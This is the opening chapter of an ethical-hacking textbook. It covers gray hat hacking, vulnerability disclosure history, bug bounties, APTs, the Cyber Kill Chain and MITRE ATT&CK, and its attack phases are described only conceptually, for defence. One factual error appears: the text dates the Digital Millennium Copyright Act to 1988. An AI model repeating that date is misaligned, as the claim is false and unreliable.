                      PART I

               Preparation

Chapter 1   Gray Hat Hacking
Chapter 2   Programming Survival Skills
Chapter 3   Linux Exploit Development Tools
Chapter 4   Introduction to Ghidra
Chapter 5   IDA Pro
This page intentionally left blank
   Gray Hat Hacking
                                                                               CHAPTER

                                                                                                 1
   In this chapter, we cover the following topics:
       • Gray hat hacking
       • Vulnerability disclosure
       • Advanced persistent threats (APTs)
       • Cyber Kill Chain
       • MITRE ATT&CK framework

What is a gray hat hacker? Why should you care? In this chapter, we attempt to define
what a gray hat hacker is and why they are so vital to the cybersecurity field. In short,
they stand in the gap between white hat hackers and black hat hackers and serve as ethi-
cal hackers, never breaking the law, but instead making the world a better place through
applying their skills for good. Now, this concept is controversial, and good people may
disagree on this topic. So, in this chapter, we try to set the record straight and give a call
to action—that you join us as gray hat hackers and practice ethical hacking in a respon-
sible manner. We also lay the foundation of other critical topics discussed throughout
the book.

Gray Hat Hacking Overview
The phrase “gray hat hacker” has been quite controversial. To some, it means a hacker
who occasionally breaks the law or does something unethical to reach a desired end. We,
as gray hat hackers, reject that notion. In a moment we will give our definition. We have
read more than one book that has further confused the meaning of the phrase and have
come to recognize that the authors of those books just don’t know any better and would
not consider themselves gray hat hackers because they don’t understand who we are, so
they attempt to denigrate our group. Therefore, as the authors of the founding book on
this topic, let us set the record straight.

History of Hacking
Ethical hacking has not always been accepted as a legal profession. There was a time
when any form of hacking, regardless of the intent, was regarded as a purely criminal
exercise. As technology has evolved and become more pervasive in our lives, so have the
understanding of hacking and the laws that govern its use. For many of the readers of

Gray Hat Hacking: The Ethical Hacker’s Handbook
              this book, these are concepts that are simply lost to history. However, it is important to
              understand this history and give credit to the hard work of the founders of the field who
              made it possible to pursue this career. We provide this information not only to inform
              but also to protect the ability of professionals to apply their hacking skills ethically so that
              they may continue to make the world a better place.
                 There was a time when fewer rules governed the use of computers because the skills
              and knowledge of lawmakers and law enforcement lagged during the rapid evolution of
              networked systems. Hackers who might attack systems out of curiosity or even mischief,
              however, had found a new world of opportunity. Not everyone indulging their curiosity
              did so without harm. However, the resulting clash with authority figures who were unable
              to understand the systems meant many benevolent, bright and intelligent hackers were
              labeled as criminals by much of the world’s software vendors and governments, regardless
              of their intent. You see, people are afraid of what they do not understand, and many will
              only understand that a hacker broke into a system without permission—not that they
              intended no harm when doing so (https://www.discovermagazine.com/technology/the-
              story-of-the-414s-the-milwaukee-teenagers-who-became-hacking-pioneers).
                 In 1986 the United States passed the Computer Fraud and Abuse Act to shore up
              existing computer fraud laws. This expressly prohibited access to computing systems without
              authorization, or in excess of authorization, and was designed to protect critical government
              systems. Shortly thereafter, the Digital Millennium Copyright Act was released in 1988. This
              criminalized attacks against access control or digital rights management (DRM). In a time
              when computer hacking was not only misunderstood, but feared, the resulting environment
              for security researchers could be very hostile. Legitimate researchers in the hacking community
              were now left to fear that finding vulnerabilities and reporting them could result in legal
              action or even jail time, according to one or both of these acts, given the argument that code
              was copyrighted and reverse engineering was therefore illegal, or that unauthorized access to
              any system (not only government systems) must be criminal (refer to Edelman v. N2H2,
              Felton et al. v. RIAA, and https://klevchen.ece.illinois.edu/pubs/gsls-ccs17.pdf). This still
              happens some places (https://www.bleepingcomputer.com/news/security/ethical-hacker-
              exposes-magyar-telekom-vulnerabilities-faces-8-years-in-jail/).
                 Increased pressure for hackers to distinguish themselves from criminals led many
              researchers to define for themselves a set of ethics that could bring no legal question,
              while others questioned the chilling effect of the law and the overall reaction to security
              research. Those in the first camp became known as “white hat hackers,” choosing to
              discuss known weaknesses with only the minimum amount of detail possible in order
              to try to get things fixed. These hackers also chose to eschew techniques that might
              possibly cause harm during their research and to only perform actions that involved full
              permission. This left the rest to be marked as “black hat hackers,” for anyone who might
              question the goodness of the law.
                 Yet, a third group emerged. Hackers who desired not to do harm but to make things
              better found themselves frustrated by the inability to make positive change in face of
              these limitations. Where were the laws to hold software makers and providers accountable
              for security decisions that negatively impacted consumers? Discovery of vulnerabilities
              had not stopped; it had simply been forced underground, while white hat techniques
remained hampered in what they were able to discover by legal limitations on their
methods. For some subset of hackers, it was not all about following the rules, but it was

                                                                                                                PART I
not about personal gain or causing harm, either.
   The phrase “gray hat hacking” was first mentioned by Peiter “Mudge” Zatko, in 1997,
in the first Black Hat proceedings,1 when he announced that he would start working with
Microsoft to resolve vulnerabilities.2 At the same event, his fellow hacker in the hacking
group L0pht, Weld Pond, said it best: “First off, being grey does not mean you engage in
any criminal activity or condone it. We certainly do not. Each individual is responsible for
his or her actions. Being grey means you recognize that the world is not black or white.”3
Later, in 1999, L0pht used the term in an article.4 (By the way, when we first decided to
write Gray Hat Hacking, we started by using the phrase “grey hat” (spelled with an e), only
to find out from the publisher that “grey” is a more common spelling in the UK, so it was
decided to use “gray” instead, which is more commonly used in the US.)
   L0pht and other pioneers in the field used their knowledge to educate authority figures,
including testifying in front of congress. This education has helped evolve attitudes toward
hacking and security research so that legitimate practitioners today can conduct work that
makes computer security better, with less fear of prosecution due to misunderstanding.
However, it is a delicate balance, and the battle to maintain that balance continues with
every new case, with every new technology, and with every new hacker.

Ethics and Hacking
You’ll also see the term “ethical hacker” referenced repeatedly in this text and in others.
This term is sometimes questioned, as morals, ethics, and laws vary among individu-
als, social groupings, and governments. In most contexts, the term is designed to dif-
ferentiate between criminality and lawful behavior—to differentiate between someone
who hacks for the greater good and in support of professional pursuits from someone
who pursues personal gain, active criminality, or harm with the skill. The guidelines
for what makes an ethical hacker is sometimes even codified for certification holders
and the members of some computer security organizations that use codes of conduct
to set expectations of behavior.

Definition of Gray Hat Hacking
As you can see, the term “gray hat” comes from an early recognition that there are more
“shades of gray,” so to speak, than the polar terms of black and white. Of course, the
terms black and white in reference to hackers comes from the old television westerns in
the US, where cowboys wearing white hats were the good guys, and the bad guys always
wore black hats. Gray hat hackers, therefore, are those who operate in between. We
choose to operate within the law and ethically, using research and adversarial knowledge
to better the world by improving defenses surrounding technology.
   To be clear, we as the authors of this book do not speak for all gray hat hackers, nor
do we even think that all persons who consider themselves gray hat hackers would agree
on this definition. However, as we lay out the technical topics of this book, we wanted to
start by first describing where we are coming from, a position of ethical hacking, whereby
Gray Hat Hacking: The Ethical Hacker’s Handbook
              our efforts are used for good, not harm. Many but not all of us gray hat hackers use these
              techniques to make a living, in a professional sense, and take great pride in our tradecraft
              and the honorable spirit in which we carry it out. We hope that you too would adopt this
              viewpoint and use your powers for good. There are enough black hat hackers out there;
              we need more gray hats, stepping in the gap, to protect others. If you enjoy this book,
              we hope you join us in clearing up the confusion on this topic. Speak up when you hear
              someone mischaracterize a gray hat hacker. Let’s protect our field, standing up for what
              is right and good and calling out those who cross the line.

              History of Ethical Hacking
              In this section, we provide an overview of the history of the field of ethical hacking, start-
              ing with the topic of vulnerability disclosure and then moving on to bug bounties. This
              will lay the foundation of later topics in this chapter, such as advanced persistent threats
              (APTs), Lockheed Martin Cyber Kill Chain, MITRE ATT&CK, penetration testing,
              threat intel, threat hunting, and security engineering.

              History of Vulnerability Disclosure
              Software vulnerabilities are as old as software itself. Simply put, software vulnerabilities
              are weakness in either the design or implementation of software that may be exploited
              by an attacker. It should be noted that not all bugs are vulnerabilities. We distinguish
              bugs from vulnerabilities by using the exploitability factor. In 2015, Synopsys produced
              a report that showed the results of analyzing 10 billion lines of code. The study showed
              that commercial code had 0.61 defects (bugs) per 1,000 lines of code (LoC), whereas
              open source software had 0.76 defects per 1,000 LoC. However, the same study showed
              that commercial code did better when compared against industry standards, such as
              OWASP Top 10.5 Further, it has been demonstrated that 1–5 percent of software defects
              turn out to be vulnerabilities.6 Since modern applications commonly have LoC counts
              in the hundreds of thousands, if not millions, a typical application may have dozens of
              security vulnerabilities. One thing is for sure: as long as we have humans developing soft-
              ware, we will have vulnerabilities. Further, as long as we have vulnerabilities, users are at
              risk. Therefore, it is incumbent on security professionals and researchers to prevent, find,
              and fix these vulnerabilities before an attacker takes advantage of them, harming the user.
              This is the ultimate mission of the gray hat hacker.
                 Many considerations arise during vulnerability disclosure. For the hacker, this includes
              details like who to contact, how to contact them, what information to provide, and how
              to assert accountability among all parties in the disclosure. For the vendor, this includes
              details such as tracking vulnerability reports, performing risk analysis, getting the right
              information to make a fix, performing a cost and benefit analysis for the programming
              effort to make the fix, and managing communication with consumers and the person
              who reported the vulnerability. When goals surrounding these considerations do not
              align between the hacker and the vendor, there is opportunity for friction. Key questions
              arise, such as how long is enough time for a vendor to make a fix? Do the hacker and
              the vendor agree that the fix is important? Should someone who reports a vulnerability
in good faith be compensated or recognized? How long should customers have to make
themselves safe by patching before the hacker or the vendor releases details about the

                                                                                                                PART I
weakness? How much detail is appropriate? Will customers apply the patch if they don’t
understand the danger of not patching?
   The answers to all of these questions are often hotly contended. Some researchers may
find non-disclosure untenable if a vendor chooses not to take action on a vulnerability.
Lingering danger to consumers in face of ongoing vulnerability can be frustrating when
there is no other authority to hold a vendor responsible for security. However, even
security-committed vendors may operate under the demands of many researchers,
budgets, product managers, consumers, and investors, requiring a rebalancing of
priorities that cannot always satisfy every researcher. There is no formal consensus on
these matters.
   Common methods of disclosure include full vendor disclosure, full public disclosure,
and coordinated disclosure. In the spirit of ethical hacking, we lean toward the concept
of coordinated disclosure; however, we hope that we present the options in a compelling
manner and let you, the reader, decide.

             NOTE These terms are controversial, and some may prefer “partial vendor
             disclosure” as an option to handle cases when proof of concept (POC) code
             is withheld and when other parties are involved in the disclosure process. To
             keep it simple, in this book we will stick with the aforementioned terms.

Full Vendor Disclosure
Starting around the year 2000, some researchers were more likely to cooperate with
vendors and perform full vendor disclosure, whereby the researcher would disclose the
vulnerability to the vendor fully and would not disclose it to any other parties. This
was due, in part, to the growing openness of vendors to accept public feedback without
resorting to legal action. However, the concept of computer security had begun to more
thoroughly permeate the vendor space, meaning more companies had begun to adopt
formal channels for disclosure.
   Most of these disclosures would require non-disclosure to the public on the part of
the researcher, or the researcher would choose not to publicly disclose details out of a
white hat ethos. However, with no formal means for handling these reports, and no
source of external accountability, this often led to an unlimited period of time to patch a
vulnerability. The perception that vendors have a lack of incentive to patch a vulnerability
led to researcher disenfranchisement that sometimes led hackers to prefer full disclosure.
   Software vendors, on the other hand, not only had to figure out new processes to
address these vulnerabilities, but they struggled with how to manage distribution
of updates to their customers. Too many changes in a short time could undermine
consumer confidence in the product. Not revealing details about what was fixed might
lead consumers not to patch. Some consumers had large and complicated environments
in which patching presented logistical problems. How long would it take for someone to
reverse-engineer a patch and create a new exploit, and would that be more or less than
the time it would take for all consumers to protect themselves?
Gray Hat Hacking: The Ethical Hacker’s Handbook
              Full Public Disclosure
              There have been countless zines, mailing lists, and Usenet groups discussing vulner-
              abilities, including the infamous Bugtraq mailing list, which was created in 1993. Many
              of these disclosures were designed to build a hacker’s reputation. Others stemmed from
              the frustration born out of a desire to see things fixed without a good formal channel to
              communicate them. Some system owners and software vendors simply didn’t understand
              security; some had no legal reason to care. However, over the years, frustration built in
              the hacker community as vendors were not seen as playing fairly or taking the research-
              ers seriously. In 2001, Rain Forest Puppy, a security consultant, made a stand and said
              that he would only give a vendor one week to respond before he would publish fully and
              publicly a vulnerability.7 In 2002, the infamous Full Disclosure mailing list was born and
              served as a vehicle for more than a decade, where researchers freely posted vulnerability
              details, with or without vendor notification.8
                 Some notable founders of the field, such as Bruce Schneier, blessed the tactic as the only
              way to get results, claiming the software vendor is most likely to fix an issue when shamed
              to do it.9 Other founders, like Marcus Ranum, disagreed by stating that we are no better off
              and less safe.10 Again, there is little to no agreement on this matter; we will allow you, the
              reader, to determine for yourself where you side. The full disclosure approach also means
              that vendors may not fix the actual problem appropriately in their rush to meet arbitrary
              deadlines.11 Of course, those type of shenanigans are quickly discovered by other researchers,
              and the process repeats. Other difficulties arise when a software vendor is dealing with a
              vulnerability in a library they did not develop. For example, when OpenSSL had issues with
              Heartbleed, thousands of websites, applications, and operating system distributions became
              vulnerable. Each of those software developers had to quickly absorb that information and
              incorporate the fixed upstream version of the library in their application. This takes time,
              and some vendors move faster than others, leaving many users less safe in the meantime as
              attackers began exploiting the vulnerability within days of release.
                 Another advantage of full public disclosure is to warn the public so that people may
              take mitigating steps prior to a fix being released. This notion is based on the premise
              that black hats likely know of the issue already, so arming the public is a good thing and
              levels the playing field, somewhat, between attackers and defenders.
                 Through all of this, the question of public harm remains. Is the public safer with or
              without full disclosure? To fully understand that question, one must realize that attackers
              conduct their own research and may know about an issue and be using it already to
              attack users prior to the vulnerability disclosure. Again, we will leave the answer to that
              question for you to decide.

              Coordinated Disclosure
              So far, we have discussed the two extremes: full vendor disclosure and full public dis-
              closure. Now, let’s take a look at a method of disclosure that falls in between the two:
              coordinated disclosure.
                 In 2007, Mark Miller of Microsoft formally made a plea for “responsible disclosure.”
              He outlined the reasons, including the need to allow time for a vendor, such as Microsoft,
              to fully fix an issue, including the surrounding code, in order to minimize the potential
for too many patches.12 Miller made some good points, but others have argued that
responsible disclosure is tilted toward vendors, and if Microsoft and others had not

                                                                                                               PART I
neglected patches for so long, there would have been no need for full disclosure in the
first place.13 Soon, people began to argue that the name “responsible disclosure” implies
that attempts to assert vendor accountability are, therefore “irresponsible.” Conceding
this point, Microsoft itself later changed its position and in 2010 made another plea
to use the term “coordinated vulnerability disclosure” (CVD) instead.14 Around this
time, Google turned up the heat by asserting a hard deadline of 60 days for fixing any
security issue prior to disclosure.15 The move appeared to be aimed at Microsoft, which
sometimes took more than 60 days to fix a problem. Later, in 2014, Google formed a
team called Project Zero, aimed at finding and disclosing security vulnerabilities, using
a 90-day grace period.16
    The hallmark of coordinated disclosure is using threat of disclosure after a reasonable
period of time to hold vendors accountable. The Computer Emergency Response
Team (CERT) Coordination Center (CC) was established in 1988 in response to
the Morris worm and has served for nearly 30 years as a facilitator of vulnerability
and patch information.17 The CERT/CC has established a 45-day grace period when
handling vulnerability reports, in that the CERT/CC will publish vulnerability data after
45 days, unless there are extenuating circumstances.18 Security researchers may submit
vulnerabilities to the CERT/CC or one of its delegated entities, and the CERT/CC will
handle coordination with the vendor and will publish the vulnerability when the patch
is available or after the 45-day grace period. See the “For Further Reading” section for
information on the DHS Cybersecurity and Infrastructure Security Agency’s stance on
coordinated vulnerability disclosure.

No More Free Bugs
So far, we have discussed full vendor disclosure, full public disclosure, and responsible
disclosure. All of these methods of vulnerability disclosure are free, whereby the security
researcher spends countless hours finding security vulnerabilities and, for various reasons
not directly tied to financial compensation, discloses the vulnerability for the public
good. In fact, it is often difficult for a researcher to be paid under these circumstances
without being construed as shaking down the vendor.
    In 2009, the game changed. At the annual CanSecWest conference, three famous
hackers, Charlie Miller, Dino Dai Zovi, and Alex Sotirov, made a stand.19 In a presentation
led by Miller, Dai Zovi and Sotirov held up a cardboard sign that read “NO MORE
FREE BUGS.” It was only a matter of time before researchers became more vocal about
the disproportionate number of hours required to research and discover vulnerabilities
versus the amount of compensation received by researchers. Not everyone in the security
field agreed, and some flamed the idea publicly.20 Others, taking a more pragmatic
approach, noted that although these three researchers had already established enough
“social capital” to demand high consultant rates, others would continue to disclose
vulnerabilities for free to build up their status.21 Regardless, this new sentiment sent a
shockwave through the security field. It was empowering to some, scary to others. No
doubt, the security field was shifting toward researchers over vendors.
Gray Hat Hacking: The Ethical Hacker’s Handbook
              Bug Bounty Programs
              The phrase “bugs bounty” was first used in 1995 by Jarrett Ridlinghafer at Netscape
              Communication Corporation.22 Along the way, iDefense (later purchased by VeriSign)
              and TippingPoint helped the bounty process by acting as brokers between researchers
              and software, facilitating the information flow and remuneration. In 2004, the Mozilla
              Foundation formed a bug bounty for Firefox.23 In 2007, the Pwn2Own competition
              was started at CanSecWest and served as a pivot point in the security field, as research-
              ers would gather to demonstrate vulnerabilities and their exploits for prizes and cash.24
              Later, in 2010, Google started its program, followed by Facebook in 2011, followed by
              the Microsoft Online Services program in 2014.25 Now there are hundreds of companies
              offering bounties on vulnerabilities.
                 The concept of bug bounties is an attempt by software vendors to respond to the
              problem of vulnerabilities in a responsible manner. After all, the security researchers, in
              the best case, are saving companies lots of time and money in finding vulnerabilities.
              On the other hand, in the worst case, the reports of security researchers, if not handled
              correctly, may be prematurely exposed, thus costing companies lots of time and money
              due to damage control. Therefore, an interesting and fragile economy has emerged as
              both vendors and researchers have interest and incentives to play well together.

              Incentives
              Bug bounty programs offer many unofficial and official incentives. In the early days,
              rewards included letters, T-shirts, gift cards, and simply bragging rights. Then, in
              2013, Yahoo! was shamed into giving more than swag to researchers. The community
              began to flame Yahoo! for being cheap with rewards, giving T-shirts or nominal gift
              cards for vulnerability reports. In an open letter to the community, Ramses Martinez,
              the director of bug finding at Yahoo!, explained that he had been funding the effort
              out of his own pocket. From that point onward, Yahoo! increased its rewards to $150
              to $15,000 per validated report.26 From 2011 to 2014, Facebook offered an exclusive
              “White Hat Bug Bounty Program” Visa debit card. 27 The rechargeable black card was
              coveted and, when flashed at a security conference, allowed the researcher to be rec-
              ognized and perhaps invited to a party.28 Nowadays, bug bounty programs still offer
              an array of rewards, including Kudos (points that allow researchers to be ranked and
              recognized), swag, and financial compensation.

              Controversy Surrounding Bug Bounty Programs
              Not everyone agrees with the use of bug bounty programs because some issues exist that
              are controversial. For example, vendors may use these platforms to rank researchers, but
              researchers cannot normally rank vendors. Some bug bounty programs are set up to
              collect reports, but the vendor might not properly communicate with the researcher.
              Also, there might be no way to tell whether a response of “duplicate” is indeed accurate.
              What’s more, the scoring system might be arbitrary and not accurately reflect the value of
              the vulnerability disclosure, given the value of the report on the black market. Therefore,
              each researcher will need to decide if a bug bounty program is for them and whether the
              benefits outweigh the downsides.
Know the Enemy: Black Hat Hacking

                                                                                                                             PART I
The famous ancient Chinese general Sun Tzu said it best more than 2,500 years ago:
“If you know the enemy and know yourself, you need not fear the result of a hundred
battles. If you know yourself but not the enemy, for every victory gained you will also
suffer a defeat.”29
   Based on this timeless advice, it behooves us to know our enemy, the black hat hacker.

Advanced Persistent Threats
Before we even discuss this topic, we can agree that not all black hat hackers are advanced
persistent threats (APTs), nor can all APTs be attributed to black hat hackers. Further, this
term has become stretched over time to include even more basic forms of attack, which is
unfortunate.30 That said, it has become a useful description of an advanced adversary that
may be used to bring light to their activities and focus attention (admittingly, sometimes
overly so) on the adversary.
   As the name implies, APTs use advanced forms of attack, they are persistent in
nature, and they are a significant threat to the enterprise. Even so, we must admit
that an adversary normally does not need to drop a 0-day on the front end of their
APT attack. There are two reasons for this: first, 0-days are hard to come by and are
perishable if used frequently, as it is just a matter of time before a white or gray hat
hacker discovers the attack and reverse-engineers it and then reports it “ethically” to a
software developer, thereby ending the life of the 0-day. Secondly, 0-days are often not
needed to get into an enterprise. Given the first threat to the attacker, they normally
only drop 0-days when absolutely needed, and often as a secondary attack, after already
gaining a foothold in an enterprise network.

Lockheed Martin Cyber Kill Chain
When discussing the persistent nature of the APT, Lockheed Martin developed a model
in 2011 called the Cyber Kill Chain, as shown here, adapted to show cost to remediate.

                                                                             Command and     Actions on
   Reconnaissance   Weaponization   Delivery   Exploitation   Installation
                                                                              Control (C2)   Objectives

                                                                Cost to Remediate

   The model was developed, by extending Department of Defense (DoD) targeting
doctrine, using intelligence, whereby the core element is indicators, which, as the name
implies, give an indicator of enemy behavior. Then, in their seminal paper,31 Hutchins,
et al. explained a common pattern of attackers, as shown in the illustration. The key
idea is that adversaries often have repeatable processes, which, if discovered early, could
be countered in a number of ways. The sooner you discover the indicators of attack and
“break” the kill chain, the cheaper the recovery. The inverse is true, too.
   The individual steps of the Cyber Kill Chain are discussed in the following sections.
Gray Hat Hacking: The Ethical Hacker’s Handbook
              Reconnaissance
              Reconnaissance are the steps taken by an adversary, prior to the attack. They often involve
              techniques that are both passive and active. Passive techniques are performed without
              even sending a packet to the target of the attack, instead meta data is gathered indirectly,
              through public documents, public sources, search engines, and cached web archives.
              Active reconnaissance on the other hand involves interacting with the target’s website,
              open interfaces, and may even involve port and service and API scanning (enumeration)
              and vulnerability scanning.

              Weaponization
              Weaponization involves the crafting of, or selection of, existing exploits to take advantage
              of the vulnerabilities found during the reconnaissance phase. Normally, an APT does not
              have to do anything fancy or use a 0-day at this stage of the attack. There are normally
              unpatched publicly known vulnerabilities that may be used. However, in rare cases, an
              adversary may craft a special exploit to a custom payload, containing a trojan or other
              back door, that provides command and control and further functionality, as desired.

              Delivery
              During this phase of the attack, the attacker sends the exploit and payload to the target
              to take advantage of a discovered vulnerability. This may involve exploiting a discovered
              web or e-mail vulnerability, or perhaps an open API interface. Unfortunately, there are
              often easier ways into an enterprise, such as a simple phishing attack, which is still effec-
              tive, after billions of dollars in training and awareness. Other forms of social engineering
              attacks may be used here as well.

              Exploitation
              During this phase, the cyber weapon is detonated and is executed in some fashion, either
              by that “helpful” user or automatically by an application such as an e-mail client or web
              browser plugin. At this point, the attacker’s code is executing on the target host. When
              directly attacking a port or service, the delivery and exploitation phase are the same.

              Installation
              During this phase, the attacker normally performs two actions (1) gain persistence and
              (2) downloads and executes a secondary payload. When it comes to persistence, the
              worst thing that can happen to an attacker at this phase is the user close the applica-
              tion that is running the malicious code or even worst reboot the computer, severing
              all connections. Therefore, the first intention of the adversary is to quickly gain some
              form of persistence.
                  This secondary payload is normally required, as the primary payload must be small,
              evade anti-virus, and must often fit within the confines of a carrier document or file.
              However, this secondary payload may be much larger in size, may execute entirely in
              memory, further evading many antivirus technologies. The secondary payload may
contain a standard and readily available attack framework, such as a remote access
trojan (RAT). Some attackers have even started to use our own tools against us, such

                                                                                                               PART I
as Metasploit.

Command and Control (C2)
After the execution of the secondary payload, the attacker will normally have some form
of command and control (C2), a military phrase, whereby the attacker may direct the
activities of the remote access tool (RAT) or attack framework. This may be a simple
form of communication that perhaps sleeps for a day (or longer) and then wakes up and
phones home, checking for commands to execute. Further, this C2 may leverage a more
sophisticated scheme of tunneling through common traffic, custom encryption, or com-
munication protocols.

Actions on Objectives
Finally, after all that effort, which may only take seconds to complete, the adversary will
perform actions on objectives, which is also a military phrase, which means, complete
the mission, complete the task you came to do. Often this involves moving laterally
across the organization, discovering sensitive information, gaining enterprise admin-
istrative privilege, establishing more forms of persistence and access, and ultimately
exfiltration of the sensitive data, extortion through ransomware, bitcoin mining, or
some other profit motive.

Courses of Action for the Cyber Kill Chain
During each phase of the Cyber Kill Chain, there are methods of dealing with an active
attack and breaking the Cyber Kill Chain of an adversary, as discussed next.

Detect
During each phase, you may detect the attacker, but it is often more feasible to detect
the attack in its early phases. The further the attacker digs into the network, the more
they begin to look like a normal user and the harder it is to detect them. There is one
prominent exception here, the “deceive” method, which we will discuss in a moment.

Deny
An effective method to deal with an attacker is to “deny” them access to sensitive
resources. However, that turns out to be harder than it sounds. Again, if an attacker
is simply taking advantage of a discovered vulnerability that, for example, bypasses the
built-in access control mechanisms, it may not be possible to deny access to that system,
particularly if it is Internet facing. However, for secondary systems, further network seg-
mentation and access controls should be deployed to deny the attacker. On the extreme
end of this defense is Zero Trust, which is becoming popular and, if properly deployed,
would greatly improve this method.
Gray Hat Hacking: The Ethical Hacker’s Handbook
              Disrupt
              The act of disrupting the attacker involves increasing their cost, either through new
              forms of antivirus or operating system updates that bring new forms of memory protec-
              tion, such as Data Execution Prevention (DEP), address space layout randomization
              (ASLR), and Stack Canaries. As the attacker evolves, we as defenders should evolve,
              too. This is particularly important on external-facing systems, but we cannot stop there:
              all systems and internal segments of the network should be considered vulnerable and
              employ methods to disrupt the attacker, thus slowing them down and buying precious
              time to detect them.

              Degrade
              To degrade an attacker means to limit their ability to be successful. For example, you may
              throttle outbound data, over a certain threshold, to limit exfiltration. Further, you may
              block all outbound traffic, except through approved and authenticated proxies, which
              may buy you time as you detect those attempts, before the attacker figures it out and
              then uses those proxies.

              Deceive
              To deceive the enemy is, again, as old as warfare itself. It is a basic element of cyber opera-
              tions and is most effective for an attacker who has made it past all other defenses but
              is lurking and poking around the internal network. The hope is that the attacker steps
              on one of the digital mouse traps (that is, honeypots) you deployed for the purpose of
              detecting that very act.

              Destroy
              Unless you happen to work for a nation-state-level cyber force, you probably won’t be
              able to “hack back.” However, you may destroy an attacker’s foothold in your own net-
              work when it’s discovered. A word of caution here: you will need to perform careful
              planning and ensure that you pull the attacker out by the roots; otherwise, you may start
              a dangerous game of hide-and-seek, this angering the attacker, who may be in your net-
              work deeper than you originally think.

              MITRE ATT&CK Framework
              Now that you have a basic understanding of APTs and the Cyber Kill Chain, it is time
              to discuss the MITRE ATT&CK framework. The MITRE ATT&CK framework goes
              deeper than the Cyber Kill Chain and allows us to get to the underlying tactics, tech-
              niques, and procedures (TTP) of the attacker, and thereby have a finer-grained approach
              to thwarting the attacker at the TTP level. As stated by Katie Nickels, Threat Intelligence
              Lead at MITRE,32 the framework is “a knowledgebase of adversary behavior.” The frame-
              work is organized with tactics across the top, which you may notice contain some of the
              Cyber Kill Chain steps, but many more. Then, the techniques are presented under each
              tactic and have been truncated for brevity in the illustration shown here.

                                                                                                                  PART I
             NOTE Although sample procedures are linked to sub-techniques, the ATT&CK
             framework does not contain a comprehensive list of procedures, nor is it
             intended to. See the site’s FAQ for more information.

   Procedures show the variations of the techniques that APTs are known to use and
are linked to the techniques pages. For example, for the Spear Phishing Attachments
technique (T1566.001), the APT19 group is known to send RTF and XLSM formats to
deliver the initial exploits.
   The framework is updated often, and new releases are provided. See the website for
the current list.33

Tactics
Table 1-1 provides the list of tactics in ATT&CK version 8 (current as of this writing).
   As can be seen, the MITRE ATT&CK framework contains a mountain of useful
information that may be applied across the cybersecurity field. We will just highlight a
few uses.

Cyber Threat Intel
The MITRE ATT&CK framework may be used to describe attacker behavior in a com-
mon language and lexicon. By its nature, cyber threat intel has a short shelf life, so it is
critical to correctly and fully identify the activity (indicators) and then to share (dissemi-
nate) that information (intel) in a timely manner, so others may look for those indicators
in their own network. The framework allows that to happen, on a global scale. Thank-
fully, the framework has been incorporated into the Structured Threat Information
Expression (STIX) language and may be distributed on Trusted Automated Exchange of
Intelligence Information (TAXII) servers. This allows the framework data to be ingested
and used by machines, in real time.
Gray Hat Hacking: The Ethical Hacker’s Handbook
                Tactic                            Description
                Reconnaissance                    Similar to the Cyber Kill Chain.
                Resource Development              Involves developing the infrastructure required for the attack,
                                                  including compromised accounts, development of capabilities,
                                                  and systems for launching attack.
                Initial Access                    Similar to delivery phase of the Cyber Kill Chain; describes
                                                  techniques to gain initial access within a network.
                Execution                         Similar to the exploitation phase of the Cyber Kill Chain; describes
                                                  techniques to get the initial exploit running.
                Persistence                       Similar to the installation phase of the Cyber Kill Chain; describes
                                                  techniques to gain and retain persistence in network.
                Privilege Escalation              Describes the known techniques to be used by attackers to
                                                  escalate their privilege in a network.
                Defense Evasion                   Describes the known techniques used for evasion. This tactic
                                                  has the deepest list of techniques, as attackers spend a lot of
                                                  effort evading.
                Credential Access                 Describes techniques used to steal account names and passwords.
                Discovery                         Describes those techniques used by attackers to discover sensitive
                                                  information and resources within the network. This phase and
                                                  the next one are particularly vulnerable to detection through
                                                  deception.
                Lateral Movement                  Describes the techniques used by attackers to move across an
                                                  organization, attacking and gaining access to new systems, often
                                                  through previously obtained privileged access.
                Collection                        Describes the techniques used by attackers to collect and stage
                                                  sensitive information.
                Command and Control               Similar to the C2 phase of the Cyber Kill Chain; describes those
                                                  techniques used to communicate between the attacker and
                                                  the malware.
                Exfiltration                      Describes the techniques used by attackers to remove sensitive
                                                  information from the network. This may be a few files, but is often
                                                  gigabytes of information.
                Impact                            Similar to the Actions on Objectives phase of the Cyber Kill
                                                  Chain; describes the techniques used by attackers to manipulate,
                                                  interrupt, or destroy systems and data.
Table 1-1 Tactics in the MITRE ATT&CK Framework

              Cyber Threat Emulation
              Once you know how the adversary acts, you can emulate their TTP and determine if (1)
              your sensors are aligned properly and detecting what they should detect and (2) if your
              incident monitoring capability is “awake” and if the response procedures are adequate.
              For example, if you determine that APT28 is a threat to your organization, due to their
              interest in your industry, then you may use the procedures identified for that APT and
run a controlled exercise to assess your organization’s ability to prevent, detect, and
withstand an attack from that APT. In this manner, cyber threat emulation (CTE)

                                                                                                               PART I
is quite successful at gauging effectiveness and maintaining alertness of the defensive
security function.
   One effective tool in this regard is Red Canary’s Atomic Red Team tool. We will
explore this tool in Chapter 9, but until then, see the “For Further Reading” section for
more information.

             CAUTION Be sure to coordinate cyber threat exercises with your boss before
             you do them. You have been warned! If you have a security operations center
             (SOC), you may want to coordinate with the leader of that organization as
             well, but it is recommended that the analysts not know the exercise is taking
             place, as their response is part of the test.

Threat Hunting
Threat hunting is a new trend in the cybersecurity field. We will discuss it in detail
in Chapter 9, but at this point, it is useful to see the connection with the MITRE
ATT&CK framework. Using the framework, the threat hunter may select a set of APTs
in a similar manner to the CTE exercise, but in this case to develop multiple hypotheses
of attack. Then the threat hunter may fold in cyber threat intelligence, along with situ-
ational awareness of the network environment, to prove or disprove those hypotheses.
We have long known that the best defenders are attackers (that is, gray hat hackers). Now
we have a tool to methodically pursue attackers by using the knowledgebase contained in
the framework to systematically hunt them down post-breach.

Security Engineering
As a security engineer, you may develop a threat model based on the MITRE ATT&CK
framework. That threat model may be developed using the MITRE ATT&CK Naviga-
tor (refer to the “For Further Reading” section). The Navigator can be used to select a
particular set of APTs, which you may download as a spreadsheet. You may then use that
spreadsheet to perform a gap assessment, leveraging the results from the CTE exercise
and using colors for particular techniques to record your level of coverage in relation to
that APT. Finally, that threat model, with an associated coverage map, could be used to
design future controls to close those gaps.

Summary
This chapter provides you with an overview of the topic of gray hat hacking, which we
define as ethical hacking—using offense for defensive purposes. We started with some
background and history on the phrase. Then we covered the history of vulnerability
disclosure and how that is tied to ethical hacking. Finally, we shifted our focus to the
adversary, the black hat hacker, and learned how to discuss, describe, share, and hunt for
their activities using the MITRE ATT&CK framework.
Gray Hat Hacking: The Ethical Hacker’s Handbook
              For Further Reading
